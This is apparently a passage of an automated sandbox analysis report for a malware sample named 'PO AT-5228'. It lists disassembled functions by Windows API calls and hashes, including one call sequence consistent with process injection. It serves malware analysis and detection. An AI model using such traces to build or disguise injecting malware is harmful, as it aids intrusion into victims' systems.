                                                                                        • Instruction Fuzzy Hash: BE0196352852119BE6213B29DC56B2E23C8DB81F64B2500AAF5079B2B2DEF0DD41C760
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BAC385,?,?,?,?,?,00000004), ref: 00BAC6F2
                                                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00BAC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BAC708
                                                                                        • CloseHandle.KERNEL32(00000000,?,00BAC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BAC70F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: d6d1eb4f399f453bec5253d2977c2eb7be7e4c95c5589a9415089ff93b28aa22
                                                                                        • Instruction ID: d0a0dbf60bf112f7196d5462f138236bf7ec9c7ab4109f507ea110ed4eb96b00
                                                                                        • Opcode Fuzzy Hash: d6d1eb4f399f453bec5253d2977c2eb7be7e4c95c5589a9415089ff93b28aa22
                                                                                        • Instruction Fuzzy Hash: FAE08632140214BBDB211F54AC49FCA7F58EB05760F104110FB157E0E09BF269118799
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00BABB72
                                                                                          • Part of subcall function 00B81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B87A85), ref: 00B81CB1
                                                                                          • Part of subcall function 00B81C9D: GetLastError.KERNEL32(00000000,?,00B87A85), ref: 00B81CC3
                                                                                        • _free.LIBCMT ref: 00BABB83
                                                                                        • _free.LIBCMT ref: 00BABB95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                        • Instruction ID: 9dfc46419d17a76a44fe568732270fafce7ee61c87388d23c07e9f46df54a4a7
                                                                                        • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                        • Instruction Fuzzy Hash: 4CE012A164674186DA24797D6E44EB713CCCF053517540C9DB469EB147CF24E841CAB4
                                                                                        APIs
                                                                                          • Part of subcall function 00B622A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B624F1), ref: 00B62303
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B625A1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B62618
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BD503A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3815369404-0
                                                                                        • Opcode ID: ac359afbcc16b002bb25866086cb9e7cd6f9e4faa67ccca6c38df7c856411603
                                                                                        • Instruction ID: 57e17d07ad1459a81981414cf3ce876c4307ef127b0d35db33990a8e1cf60cf6
                                                                                        • Opcode Fuzzy Hash: ac359afbcc16b002bb25866086cb9e7cd6f9e4faa67ccca6c38df7c856411603
                                                                                        • Instruction Fuzzy Hash: B371CDB4921285CAC724EF6AA89079DBBE5FB7934039841BEE909C7F71CB344816CF15
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID: EA06
                                                                                        • API String ID: 2638373210-3962188686
                                                                                        • Opcode ID: f0fdcebc083a9516d3a7a0fea758fcdbeef81521625b4d48931c4a21ef871959
                                                                                        • Instruction ID: 5edbab5c3ee832bad6a74c4457b2191e9457f08c61908c6eecd505199fc1dada
                                                                                        • Opcode Fuzzy Hash: f0fdcebc083a9516d3a7a0fea758fcdbeef81521625b4d48931c4a21ef871959
                                                                                        • Instruction Fuzzy Hash: DE01F5729042187EDB28D7A8C856FEEBBF8DB05705F00459AF1A2D6181E5B4E708CB60
                                                                                        APIs
                                                                                        • _strcat.LIBCMT ref: 00BC08FD
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • _wcscpy.LIBCMT ref: 00BC098C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1012013722-0
                                                                                        • Opcode ID: d1ab93a4ec821816ffa4be548282a279f94cf653a4685e592d9a8e9d0882b29d
                                                                                        • Instruction ID: 318f78f41d4b31c358e0e1f85e23961fcbddc78d3bf81bb64a91ba5a9f60a71e
                                                                                        • Opcode Fuzzy Hash: d1ab93a4ec821816ffa4be548282a279f94cf653a4685e592d9a8e9d0882b29d
                                                                                        • Instruction Fuzzy Hash: 56912934A10605DFCB18EF18C491A69B7E5EF59310B5584ADF85A8F3A2DB34ED45CF80
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00BAFEDD
                                                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 00BAFF96
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__wsplitpath
                                                                                        • String ID:
                                                                                        • API String ID: 2679896820-0
                                                                                        • Opcode ID: 00da8acf12fb81ccd191d533c0a7d0500726cf30342fbe47804ac0c2694bf6f1
                                                                                        • Instruction ID: d21c0ec86401e1cb2ddbbe57acda1602ae8f71901274c8e24551666034267064
                                                                                        • Opcode Fuzzy Hash: 00da8acf12fb81ccd191d533c0a7d0500726cf30342fbe47804ac0c2694bf6f1
                                                                                        • Instruction Fuzzy Hash: 9F5171312043029FCB14EF68C491BBEB3E5EF4A310F0485ADF96A8B392DB75A945CB51
                                                                                        APIs
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • __getbuf.LIBCMT ref: 00B88EFA
                                                                                        • __lseeki64.LIBCMT ref: 00B88F6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                        • String ID:
                                                                                        • API String ID: 3311320906-0
                                                                                        • Opcode ID: 54df22dd26957c9bb5e2bcc933ac72e1bfdbdc24681d1ee8e115236f6d1801ac
                                                                                        • Instruction ID: f324a23c8335d9676cc450753d45b34e00520580871efdc2cc8eb265cc55409f
                                                                                        • Opcode Fuzzy Hash: 54df22dd26957c9bb5e2bcc933ac72e1bfdbdc24681d1ee8e115236f6d1801ac
                                                                                        • Instruction Fuzzy Hash: 68411171100A019FD324BF28C891A7A77E6EF85331B548AADE6AA872F1DB74DC40CB50
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00B63A73
                                                                                          • Part of subcall function 00B81405: __lock.LIBCMT ref: 00B8140B
                                                                                          • Part of subcall function 00B63ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B63AF3
                                                                                          • Part of subcall function 00B63ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B63B08
                                                                                          • Part of subcall function 00B63D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B63AA3,?), ref: 00B63D45
                                                                                          • Part of subcall function 00B63D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00B63AA3,?), ref: 00B63D57
                                                                                          • Part of subcall function 00B63D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C21148,00C21130,?,?,?,?,00B63AA3,?), ref: 00B63DC8
                                                                                          • Part of subcall function 00B63D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00B63AA3,?), ref: 00B63E48
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B63AB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 924797094-0
                                                                                        • Opcode ID: ebfa560ec7c6c76de61798f81e786b88398fdd545142dece86b2d8040be41e32
                                                                                        • Instruction ID: 5f0c1cd768534391316d394131984c014a9d9287a84294377c2cd832c3df3afa
                                                                                        • Opcode Fuzzy Hash: ebfa560ec7c6c76de61798f81e786b88398fdd545142dece86b2d8040be41e32
                                                                                        • Instruction Fuzzy Hash: A31190715143419BC310EF69EC45A0EFBE8EBA4710F04895EF885872B1DB709A56CB92
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B64582,?,?,?,?,00B62E1A), ref: 00B6482D
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00B64582,?,?,?,?,00B62E1A), ref: 00BD4089
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 029c670c2ddec1cd1e5bf6d01203c62aaee7b30b3def34192d7f01b725e02e0e
                                                                                        • Instruction ID: dd05e9498e7ea0d72d50b2d0fb803b9b61f944cf4cce929346c888987e6a73e1
                                                                                        • Opcode Fuzzy Hash: 029c670c2ddec1cd1e5bf6d01203c62aaee7b30b3def34192d7f01b725e02e0e
                                                                                        • Instruction Fuzzy Hash: 8E018C70244348BFF3250E68CC8AF667ADCEB01768F108399BAE56B1E0C7B91C45CB50
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00B8EA29
                                                                                        • __close_nolock.LIBCMT ref: 00B8EA42
                                                                                          • Part of subcall function 00B87BDA: __getptd_noexit.LIBCMT ref: 00B87BDA
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 1046115767-0
                                                                                        • Opcode ID: 563abcf9d35c8b583e392384aefcc6383b655c91b388a047a4f6c6414aa8af22
                                                                                        • Instruction ID: adee96e13010f3d01a01fa2a87a3caa403f05b7e4deb056a3ac8b02158a2a6fc
                                                                                        • Opcode Fuzzy Hash: 563abcf9d35c8b583e392384aefcc6383b655c91b388a047a4f6c6414aa8af22
                                                                                        • Instruction Fuzzy Hash: 71117C728456109AD72ABFA8D8827587BE1AF82735F2643C0E4715F1F2CBB4C841DBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B8395C: __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                                                          • Part of subcall function 00B8395C: __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                                                          • Part of subcall function 00B8395C: RtlAllocateHeap.NTDLL(01920000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                                                        • std::exception::exception.LIBCMT ref: 00B7F51E
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                                                          • Part of subcall function 00B86805: RaiseException.KERNEL32(?,?,0000000E,00C16A30,?,?,?,00B7F538,0000000E,00C16A30,?,00000001), ref: 00B86856
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: a2316af6175dfd57f43c415353251ef7b5deaa66efb89929d488a691e9fbb9a0
                                                                                        • Instruction ID: 862ffa3226dc664b7082b15761f19a9acc44a29ef9706f776fd6a4b5b39118c9
                                                                                        • Opcode Fuzzy Hash: a2316af6175dfd57f43c415353251ef7b5deaa66efb89929d488a691e9fbb9a0
                                                                                        • Instruction Fuzzy Hash: 23F0AF3210421EA7DB04BFA9DC019EE77ECAF00354F6484B6FA1992191DBF0DB40D7AA
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock_file_memset
                                                                                        • String ID:
                                                                                        • API String ID: 26237723-0
                                                                                        • Opcode ID: 18282ce24abdf3774ef4824978e7fc5fecea91c684d4633c2a005f5b936a1529
                                                                                        • Instruction ID: 0271a35b1a0a5f6209f8f218b61d72c5b7c7621e69556ed82203cca5f9804164
                                                                                        • Opcode Fuzzy Hash: 18282ce24abdf3774ef4824978e7fc5fecea91c684d4633c2a005f5b936a1529
                                                                                        • Instruction Fuzzy Hash: 91014471801209EBCF22BFA5CC0259E7BE1FF40B61F1541A9F824571B1D7718B61EB91
                                                                                        APIs
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • __lock_file.LIBCMT ref: 00B83629
                                                                                          • Part of subcall function 00B84E1C: __lock.LIBCMT ref: 00B84E3F
                                                                                        • __fclose_nolock.LIBCMT ref: 00B83634
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: dd6ed2be3a065e0507c6c05020a4ccdd382219fbbdf6514e2c9936a82cca0ece
                                                                                        • Instruction ID: 2d80b2fdaf969992c17b0d58512435933d41134d19c3f7444d3030bbee99ec44
                                                                                        • Opcode Fuzzy Hash: dd6ed2be3a065e0507c6c05020a4ccdd382219fbbdf6514e2c9936a82cca0ece
                                                                                        • Instruction Fuzzy Hash: 6DF0B431805205AADB117F69C84276E7BE0AF41F35F2581D8E420AB2F1DB7C8A01DF55
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00B7E581,00000010,?,00000010,?,00000000), ref: 00B6C1F4
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00B7E581,00000010,?,00000010,?,00000000), ref: 00B6C224
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 626452242-0
                                                                                        • Opcode ID: 61cf416a058d0c859b3d1be1c75260a9fd818e6588f0b323a03c7b67714c2a71
                                                                                        • Instruction ID: 885ba880efed600f3b2cb486dd72bef3b8c2fe08c1b2afccec6b046117379fc2
                                                                                        • Opcode Fuzzy Hash: 61cf416a058d0c859b3d1be1c75260a9fd818e6588f0b323a03c7b67714c2a71
                                                                                        • Instruction Fuzzy Hash: 7301D672200204BFEB146B65DC86F7B7FADEF86760F108169FE09DE1D0DA71E9408661
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 0195F11B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0195F1B1
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0195F1D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                        • Instruction ID: 88026c20e937230076aca9685d21d6b07609eef795dfb4c78a02ec37a2184419
                                                                                        • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                        • Instruction Fuzzy Hash: 2C12CD24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                                                                                        APIs
                                                                                        • __flush.LIBCMT ref: 00B82A0B
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flush__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 4101623367-0
                                                                                        • Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                                                                        • Instruction ID: aa7da5e9a2e4172fa9c762a24a48d2e58b040a45eb4d6cf3551d6d4ad64934c4
                                                                                        • Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                                                                        • Instruction Fuzzy Hash: 2D416271600706AFDB2CAFA9C8815AE7BE6EF44360F2485BDE855C7264EA70DD41CB44
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B64774
                                                                                        Memory Dump Source
